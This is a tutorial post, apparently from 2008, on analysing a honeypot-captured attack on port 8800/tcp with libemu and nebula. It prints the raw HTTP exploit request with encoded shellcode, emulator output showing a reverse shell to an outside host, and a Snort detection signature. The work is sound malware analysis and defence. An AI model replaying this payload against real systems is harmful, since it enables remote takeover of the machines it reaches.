
Using Tools from mwcollect

Recently, the SANS ISC and others reported a spike in 8800/tcp traffic. As there is only little information available about what is suddenly going on on that port, we take the chance to demonstrate how to use tools from mwcollect to get some insight.

The first thing we need is packets, ideally captures of complete sessions. Hint: Ask your local honeynet guy - he is hopefully running honeytrap. If so, chances are good that he can provide packet dumps and session captures like the one below, recorded on 8800/tcp on 2008-06-08:

GET / HTTP/1.0
User-Agent: DFXPDFXPAAA.........IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIilCZjKpMkXYiKOKOKOSPLK2LGTwTLKcuulnk1lWuSHvazOnk2oVxlKaOQ0Vaxk2il
KDtLKFa8ntqkpoiNLotKpQdww9QxJdMEQYRXkL4ekpTwTdhqezENksoEtS1ZK3VLKVlRknk3o5LgqzKtC6Lnkk90lddUL3QySfQkkQtlKpCVPLKQPTLlK405LlmLKSpc8qNrHLNpNdNXlrpYoiFQvpS1vPh5cVR1xRWsCtrqOV4i
oN058zkzMkL5kpPIohVqOniM50fOqZMEXuR3e2JwryozpqxyIwyl5NM3gIokfPSbsScF3QS0SPCBsKON0qx0RUkMliLcV58ETRJ2FPSMYyqoe1xZLL9NJsPPWkOhV2JVppQRuyohPQvbJRDpfQx3SRMbJf01IEyzlniJGpjQTMYX
b4qIPycnJoeOyymYnG2vMkNpBtllMCJVXNKLklkPhRRYnlsR6kOPuuxKOxVckaGV2PQpQ0QcZC1PQpQSepQ9oJpqxNMJyS58NScyoIFCZyoyoVWYoxP58M7BYo6SIyoBUuTKOKfkOQgiliozp58Hpnj34Cov3YoXVKOxPA
Authorization: Basic UVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlF
VRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQm5TOEFFSkNRa0pBejBtYUJ5djhQUWxKcUFsak5MandGV25UdnVFUkdXRkNMK3E5MTZxOTE1Ly9uUWtKQ1FrSkNRa0pDUWt
KQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0p
DUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkN
Ra0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1F
rSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWt
KQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0p
DUWtKQ1FrST0=

Looks like someone is trying to exploit a vulnerability in some HTTP service. Let's check whether the User-Agent and Authorization header values contain some sort of shellcode. This can easily be done with libemu's sctest utility:

/opt/libemu/bin/sctest -Sgs 1000000 < rawsession-8800tcp
verbose = 0
success offset = 0x0000002c
hooked ExitProcess
hooked ExitThread
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:656 env_w32_hook_WSAStartup
WSAStartup version 2
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:578 env_w32_hook_WSASocketA
SOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0, dwFlags=0);
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:228 env_w32_hook_connect
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:151 env_w32_hook_CreateProcessA
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:896 env_w32_hook_WaitForSingleObject
WaitForSingleObject(hHandle=4712,  dwMilliseconds=-1)
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:190 env_w32_hook_closesocket
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:870 env_w32_hook_SetUnhandledExceptionFilter
Exception filter 7c800000
cpu error opcode 62 not supported

stepcount 172737
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x0012fe80 => 
           = "ws2_32";
) = 0x71a10000;
int WSAStartup (
     WORD wVersionRequested = 2;
     LPWSADATA lpWSAData = 1244276;
) =  0;
SOCKET WSASocket (
     int af = 2;
     int type = 1;
     int protocol = 0;
     LPWSAPROTOCOL_INFO lpProtocolInfo = 0;
     GROUP g = 0;
     DWORD dwFlags = 0;
) =  66;
int connect (
     SOCKET s = 66;
     struct sockaddr_in * name = 0x0012fe6c => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 27140 (port=1130);
             struct in_addr sin_addr = {
                 unsigned long s_addr = -591643822 (host=82.59.188.220);
             };
             char sin_zero = "       ";
         };
     int namelen = 16;
) =  0;
BOOL CreateProcess (
     LPCWSTR pszImageName = 0x00000000 => 
         none;
     LPCWSTR pszCmdLine = 0x0012fe60 => 
           = "cmd";
     LPSECURITY_ATTRIBUTES psaProcess = 0x00000000 => 
         none;
     LPSECURITY_ATTRIBUTES psaThread = 0x00000000 => 
         none;
     BOOL fInheritHandles = 1;
     DWORD fdwCreate = 0;
     LPVOID pvEnvironment = 0x00000000 => 
         none;
     LPWSTR pszCurDir = 0x00000000 => 
         none;
     struct LPSTARTUPINFOW psiStartInfo = 0x0012fe0c => 
         struct   = {
             DWORD cb = 68;
             LPTSTR lpReserved = 0;
             LPTSTR lpDesktop = 0;
             LPTSTR lpTitle = 0;
             DWORD dwX = 0;
             DWORD dwY = 0;
             DWORD dwXSize = 0;
             DWORD dwYSize = 0;
             DWORD dwXCountChars = 0;
             DWORD dwYCountChars = 0;
             DWORD dwFillAttribute = 0;
             DWORD dwFlags = 257;
             WORD wShowWindow = 0;
             WORD cbReserved2 = 0;
             LPBYTE lpReserved2 = 0;
             HANDLE hStdInput = 66;
             HANDLE hStdOutput = 66;
             HANDLE hStdError = 66;
         };
     struct PROCESS_INFORMATION pProcInfo = 0x0052f74c => 
         struct   = {
             HANDLE hProcess = 4711;
             HANDLE hThread = 4712;
             DWORD dwProcessId = 4713;
             DWORD dwThreadId = 4714;
         };
) =  -1;
DWORD WaitForSingleObject (
     HANDLE hHandle = 4712;
     DWORD dwMilliseconds = -1;
) =  0;
int closesocket (
     SOCKET s = 66;
) =  0;

Cool! We found the start of some shellcode at offset 0x0000002c. And not only that, libemu performs a deep analysis of what it does. The shellcode seems to connect back to a host (82.59.188.220:1130) and hand it a command-line prompt: the spawned cmd's standard input, output and error handles are all bound to the socket. Now let's start a netcat listener on port 1130/tcp to catch the shell and process the shellcode again, this time with --interactive. We redirect the connect call to localhost with --connect 127.0.0.1:1130 and replace the executed command shell by passing --cmd cmd="replacement string". That way we have full control over the (emulated) victim. So again, running

/opt/libemu/bin/sctest --cmd cmd="wine cmd_orig.exe" --interactive --connect 127.0.0.1:1130 -Sgs 1000000 < rawsession-8800tcp

in a terminal (where cmd_orig.exe is an original Windows cmd.exe file placed in your wine environment) and

$ netcat -l -p 1130

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\tw\Desktop>

in a different terminal in parallel fools the shellcode and gives us the shell.

What else? Assuming you have more than one trace, wouldn't it be cool to extract the parts they have in common? And eventually build an IDS signature to detect and block future intrusion attempts? Have a look at nebula, it gives you what you want. Start the daemon as follows (-t 20 sets the cluster size threshold to 20, so you need at least that many different exploit variants):

$ /opt/nebula/bin/nebula -s noodlesoup -t 20

The daemon accepts submissions on the default port now. To submit session dumps, use the nebula command line client:

$ /opt/nebula/bin/nebulaclient -s noodlesoup -c localhost -p 4712 -d /path/to/dumpfiles/

In our case we had 222 samples of 28 unique exploit variants. Nebula produced the following snort signature. Note that the User-Agent part is only matched by a few short fragments at fixed distances, i.e. it varies between samples, whereas the Authorization string is static in all samples and thus perfectly suited for a detection rule:

---- Signature type: snort ----------------------------------------------------------------------------
alert tcp any any -> $HOME_NET 8800 (msg: "nebula rule 2000001 rev. 1"; \
 content: "GET / HTTP/1.0|0d 0a|User-Agent\: DFXPDFXPAAA|eb 03|Y|eb 05 e8 f8 ff ff ff|II"; offset: 0; depth: 51; \
 content: "QZj"; distance: 16; within: 70; \
 content: "A0A"; distance: 4; within: 24; \
 content: "XP8"; distance: 1; within: 21; \
 content: "ZK"; distance: 9; within: 523; \
 content: "|0d 0a|Authorization\: Basic UVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRk
           JRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCU
           VVGQlFVRkJRVUZCUVVGQm5TOEFFSkNRa0pBejBtYUJ5djhQUWxKcUFsak5MandGV25UdnVFUkdXRkNMK3E5MTZxOTE1Ly9uUWtKQ1FrSkNRa0pDUWtKQ1Fr
           SkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0p
           DUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1
           FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa
           0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtK
           Q1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkN
           Ra0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUW
           tKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrS
           kNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrST0=|0d 0a 0d 0a|"; distance: 60; within: 1854; \
 sid: 2000001; rev: 1;)
-------------------------------------------------------------------------------------------------------

That's it so far. If you want to try it yourself, grab the sample used in the above tests from here. And next time they get the spike and you get the analysis. :-)

Have fun!

Tillmann Werner // 2008-06-19 15:00 CET